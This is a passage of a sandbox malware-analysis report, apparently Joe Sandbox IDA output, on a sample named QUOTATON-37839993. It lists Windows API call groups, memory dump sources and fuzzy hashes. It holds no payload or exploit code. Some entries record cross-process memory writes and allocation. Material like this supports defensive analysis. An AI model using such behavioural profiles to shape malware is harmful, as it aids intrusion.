                                                                      • Instruction Fuzzy Hash: 5331D171500219EFDF14CF68DA4CA9E3BB5EB04316F10462AF924F71D2C7B09918DB91
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00E5B204
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E5B221
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E5B259
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E5B27F
                                                                      • _wcsstr.LIBCMT ref: 00E5B289
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 3902887630-0
                                                                      • Opcode ID: 08b386d84a5c3abb5cb9a122c1985ebff06a87c9b98567e6d6d5e0d2486069b3
                                                                      • Instruction ID: 6c7ba68d521827ffcbb88b4874b3786f10cbaf9173f1d4ae58654e9ecfe84f00
                                                                      • Opcode Fuzzy Hash: 08b386d84a5c3abb5cb9a122c1985ebff06a87c9b98567e6d6d5e0d2486069b3
                                                                      • Instruction Fuzzy Hash: A421F5352042107BEB155B75AC09E7F7B98DF49711F105529FC09FA1A1EF619C4497A0
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E8B192
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E8B1B7
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E8B1CF
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00E8B1F8
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E70E90,00000000), ref: 00E8B216
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MetricsSystem
                                                                      • String ID:
                                                                      • API String ID: 2294984445-0
                                                                      • Opcode ID: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
                                                                      • Instruction ID: 1b1311efc6baca723db54ccc7e02abe3ea2fc0a4159d6aefa0265d345888d51d
                                                                      • Opcode Fuzzy Hash: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
                                                                      • Instruction Fuzzy Hash: DA219172911251AFCB14AF39DC18A6A3BA4FB05325F145738F93EF71E0E73098559B90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E59320
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59352
                                                                      • __itow.LIBCMT ref: 00E5936A
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59392
                                                                      • __itow.LIBCMT ref: 00E593A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow$_memmove
                                                                      • String ID:
                                                                      • API String ID: 2983881199-0
                                                                      • Opcode ID: b97a8a34cf131faba86f580534c88053055bf15c0c9d36dc3e76cfa56dec120c
                                                                      • Instruction ID: c76793d35303d9f51c10825ef00b3e81142956d5104a8f61b96a1792d2d9f564
                                                                      • Opcode Fuzzy Hash: b97a8a34cf131faba86f580534c88053055bf15c0c9d36dc3e76cfa56dec120c
                                                                      • Instruction Fuzzy Hash: 19210731B00308FBDB10AB618C89EEE7BA9EF88715F046425FD48F71C2D6B09D499791
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00E75A6E
                                                                      • GetForegroundWindow.USER32 ref: 00E75A85
                                                                      • GetDC.USER32(00000000), ref: 00E75AC1
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00E75ACD
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00E75B08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: 5f80e24089c55087cc9007e486f56fdccd2c18c5cb96cd7ac05423cf5e2237a3
                                                                      • Instruction ID: 1a2d2e6fd01dde35e7ace102b8ee89e0f8ec1929004db5fa1853d52b1e22f541
                                                                      • Opcode Fuzzy Hash: 5f80e24089c55087cc9007e486f56fdccd2c18c5cb96cd7ac05423cf5e2237a3
                                                                      • Instruction Fuzzy Hash: 6121C336A00204AFDB04EF65DD88A9ABBE5EF58350F14C179F849E7362DA70BC44DB90
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E0134D
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E0135C
                                                                      • BeginPath.GDI32(?), ref: 00E01373
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E0139C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: f76a97daac63b70872238a6eab85781c7a84cb97a4663b999beb275bf2673856
                                                                      • Instruction ID: 0cd92a6a7cacda647067a94a0b95ce7790d3245a0252115695e59e1b8314df22
                                                                      • Opcode Fuzzy Hash: f76a97daac63b70872238a6eab85781c7a84cb97a4663b999beb275bf2673856
                                                                      • Instruction Fuzzy Hash: 30214F32800604DFDB159F16EC09B6D7BA8EB00355F55427AF414BA1F0D776A8DADB50
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E64ABA
                                                                      • __beginthreadex.LIBCMT ref: 00E64AD8
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00E64AED
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E64B03
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E64B0A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                      • String ID:
                                                                      • API String ID: 3824534824-0
                                                                      • Opcode ID: 6501f84c2c54c0a11c923ea288172e18ca3230ba80a8c732c3745392958c58cd
                                                                      • Instruction ID: 99a33329deacf55581dc9bba6b4d614f5690ba6fbb3933bd3611b4d7b6b6018e
                                                                      • Opcode Fuzzy Hash: 6501f84c2c54c0a11c923ea288172e18ca3230ba80a8c732c3745392958c58cd
                                                                      • Instruction Fuzzy Hash: DC1108B6905218BFC7009FA9EC08E9B7FECEB45360F144265F815F32A1D675D94887A0
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E5821E
                                                                      • GetLastError.KERNEL32(?,00E57CE2,?,?,?), ref: 00E58228
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00E57CE2,?,?,?), ref: 00E58237
                                                                      • HeapAlloc.KERNEL32(00000000,?,00E57CE2,?,?,?), ref: 00E5823E
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
                                                                      • Instruction ID: e04d4e01b0c665b705eade41a0249e62c6573db14e2488e3e369285ae92af8f9
                                                                      • Opcode Fuzzy Hash: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
                                                                      • Instruction Fuzzy Hash: 27016D75601204BFDB204FA6DD48D6B7FACFF8A755B500929FC09E2220DA318C18DB60
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?,?,00E57455), ref: 00E57127
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57142
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57150
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?), ref: 00E57160
                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E5716C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
                                                                      • Instruction ID: 1963d9afad58e75a3f6887c74006910d3ddfbb3526fffe96ba7ed432212887f2
                                                                      • Opcode Fuzzy Hash: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
                                                                      • Instruction Fuzzy Hash: CD01DF72602604BFCB144F66ED44BAA7BADEF44792F100464FD88E2220DB31DD188BA0
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65260
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E6526E
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65276
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E65280
                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: c5e8f389dfe2fe17bbb9d27191ce418e22e6c8dc741c92207ee5c215b57e02f8
                                                                      • Instruction ID: ac7958866f4732b012b09d17e670cf787a8d769f6651a1278a607239e9c8548c
                                                                      • Opcode Fuzzy Hash: c5e8f389dfe2fe17bbb9d27191ce418e22e6c8dc741c92207ee5c215b57e02f8
                                                                      • Instruction Fuzzy Hash: AD015732E42A29DBCF00EFE5EC989EDBB78FB09711F401456E945F2161CB3055548BA1
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58121
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E5812B
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5813A
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58141
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58157
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
                                                                      • Instruction ID: f5079eefb673988cf39e962a5d6179df1ced81358eaa1cc77120b049553686d3
                                                                      • Opcode Fuzzy Hash: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
                                                                      • Instruction Fuzzy Hash: FEF0C270202304AFEB110FA6ED8CE673BACFF49759B100425F949F2151DB60DC09EB60
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E5C1F7
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E5C20E
                                                                      • MessageBeep.USER32(00000000), ref: 00E5C226
                                                                      • KillTimer.USER32(?,0000040A), ref: 00E5C242
                                                                      • EndDialog.USER32(?,00000001), ref: 00E5C25C
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: dddd8d0a36e5f578a12a5564215d376c07ffc0fbcbf9176d3ced824489f32b3d
                                                                      • Instruction ID: b6893e3ccfa1acaf44fb5f25a069c441cda6f93f69e777bb9d50dbaa1e811f16
                                                                      • Opcode Fuzzy Hash: dddd8d0a36e5f578a12a5564215d376c07ffc0fbcbf9176d3ced824489f32b3d
                                                                      • Instruction Fuzzy Hash: D901A234404704AFEB205B61ED5EB9677B8BB00B06F100669E986B14F0DBE4A98C9B90
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 00E013BF
                                                                      • StrokeAndFillPath.GDI32(?,?,00E3B888,00000000,?), ref: 00E013DB
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E013EE
                                                                      • DeleteObject.GDI32 ref: 00E01401
                                                                      • StrokePath.GDI32(?), ref: 00E0141C
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
                                                                      • Instruction ID: b8b0feaad721f917429dfd6e92a44a73260bcc9218df46d21fbce9587d7e1b84
                                                                      • Opcode Fuzzy Hash: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
                                                                      • Instruction Fuzzy Hash: 88F0C932004A08EFDB195F27ED4CB583BA5A71132AF189275E429A90F1CB3659DADF50
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00E6C432
                                                                      • CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6C44A
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • CoUninitialize.OLE32 ref: 00E6C6B7
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                      • String ID: .lnk
                                                                      • API String ID: 2683427295-24824748
                                                                      • Opcode ID: 6cae7e78811dfb650ac293248375e402b32bb16c4fd27b2d995de1ad8150b863
                                                                      • Instruction ID: b04f8d99de322dfcf29fe4c3e6c1f792aba2b27c570abe37630a7b926ea7d8b7
                                                                      • Opcode Fuzzy Hash: 6cae7e78811dfb650ac293248375e402b32bb16c4fd27b2d995de1ad8150b863
                                                                      • Instruction Fuzzy Hash: 84A14BB1104205AFD704EF54C881EAFB7E8FF85344F00592DF595A72A2EB71EA49CB62
                                                                      APIs
                                                                        • Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
                                                                        • Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E07A51: _memmove.LIBCMT ref: 00E07AAB
                                                                      • __swprintf.LIBCMT ref: 00E12ECD
                                                                      Strings
                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E12D66
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                      • API String ID: 1943609520-557222456
                                                                      • Opcode ID: 876cf5b097626cbf70078bfb5508bc36112c952abc28f773d6ca6de538487ea3
                                                                      • Instruction ID: 0aee539532ab63246e85241a70a8800d127a37797b9932f954d9ece9f8f14441
                                                                      • Opcode Fuzzy Hash: 876cf5b097626cbf70078bfb5508bc36112c952abc28f773d6ca6de538487ea3
                                                                      • Instruction Fuzzy Hash: 1D916D715082159FCB14EF24D885CAFB7E8EF85714F00691DF596BB2A2EA30ED84CB52
                                                                      APIs
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                      • CoInitialize.OLE32(00000000), ref: 00E6B9BB
                                                                      • CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6B9D4
                                                                      • CoUninitialize.OLE32 ref: 00E6B9F1
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                      • String ID: .lnk
                                                                      • API String ID: 2126378814-24824748
                                                                      • Opcode ID: 82abaecf0167d088ba125a92e5542744694e2e40432b884899635e6432752c3a
                                                                      • Instruction ID: 4249a42017392ebc9a52df9df312026d8a99ea1064cce771524107457bb10250
                                                                      • Opcode Fuzzy Hash: 82abaecf0167d088ba125a92e5542744694e2e40432b884899635e6432752c3a
                                                                      • Instruction Fuzzy Hash: 8AA16A756043059FCB04DF14C884D6ABBE5FF89324F149998F899AB3A2CB31ED85CB91
                                                                      APIs
                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00E5B4BE
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container$%
                                                                      • API String ID: 3565006973-1286912533
                                                                      • Opcode ID: aa1e98e34acd33665776f4852c72f8e4fc9d5bc32dae1e02c3e153b03d173de7
                                                                      • Instruction ID: 82976ee106a7a0cbf8fb33bad59f64c3e664266c01889050e35e077dfc55c064
                                                                      • Opcode Fuzzy Hash: aa1e98e34acd33665776f4852c72f8e4fc9d5bc32dae1e02c3e153b03d173de7
                                                                      • Instruction Fuzzy Hash: CC915C70600601AFDB14DF64C884B6ABBE9FF48711F20996DFD4AEB691EB70E845CB50
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00E250AD
                                                                        • Part of subcall function 00E300F0: __87except.LIBCMT ref: 00E3012B
                                                                      Similarity
                                                                      • API ID: ErrorHandling__87except__start
                                                                      • String ID: pow
                                                                      • API String ID: 2905807303-2276729525
                                                                      • Opcode ID: c15018871e88e36d05c18ee6ee42866fe2eaaa13a2d7b408832a07e4f5ca1dfb
                                                                      • Instruction ID: 904cc596b7eb16e94838e98ee1bb223cd9d260ea21ac538ad6ae5f4753071dab
                                                                      • Opcode Fuzzy Hash: c15018871e88e36d05c18ee6ee42866fe2eaaa13a2d7b408832a07e4f5ca1dfb
                                                                      • Instruction Fuzzy Hash: 0551AF2290D9018ADB117724DE297BF2FD0AB40704F20AD59E4D5B62AADE348DD8DB82
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: 3c$_
                                                                      • API String ID: 4104443479-4099079164
                                                                      • Opcode ID: a42eff83153c2f5632c3f961f1be5060dc1f49fb7a44840bb75c63521edf1a87
                                                                      • Instruction ID: 5ee055a8027e540ee4e31e17a5880eb777488a4d3516dc057444bea10329d2dc
                                                                      • Opcode Fuzzy Hash: a42eff83153c2f5632c3f961f1be5060dc1f49fb7a44840bb75c63521edf1a87
                                                                      • Instruction Fuzzy Hash: FE516EB09006159FCB64CF68D980AEEB7F1FF44314F14856AE85AE7350EB30A995CB51
                                                                      APIs
                                                                        • Part of subcall function 00E614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59296,?,?,00000034,00000800,?,00000034), ref: 00E614E6
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E5983F
                                                                        • Part of subcall function 00E61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00E614B1
                                                                        • Part of subcall function 00E613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00E61409
                                                                        • Part of subcall function 00E613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E5925A,00000034,?,?,00001004,00000000,00000000), ref: 00E61419
                                                                        • Part of subcall function 00E613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E5925A,00000034,?,?,00001004,00000000,00000000), ref: 00E6142F
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E598AC
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E598F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: b1d8254eb7d5d3ee7d05dcd09555e9f3963714a4179054a38c681e3416fc4764
                                                                      • Instruction ID: 918f710054ff957920c6fc630889471232f38e28b651a487d6302da371a881b8
                                                                      • Opcode Fuzzy Hash: b1d8254eb7d5d3ee7d05dcd09555e9f3963714a4179054a38c681e3416fc4764
                                                                      • Instruction Fuzzy Hash: 4F416176A0121CBFCB11DFA4CC81ADEBBB8EF49340F144199F955B7181DA706E89CBA0
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E8F910,00000000,?,?,?,?), ref: 00E879DF
                                                                      • GetWindowLongW.USER32 ref: 00E879FC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E87A0C
                                                                      Strings
                                                                      Memory Dump Source
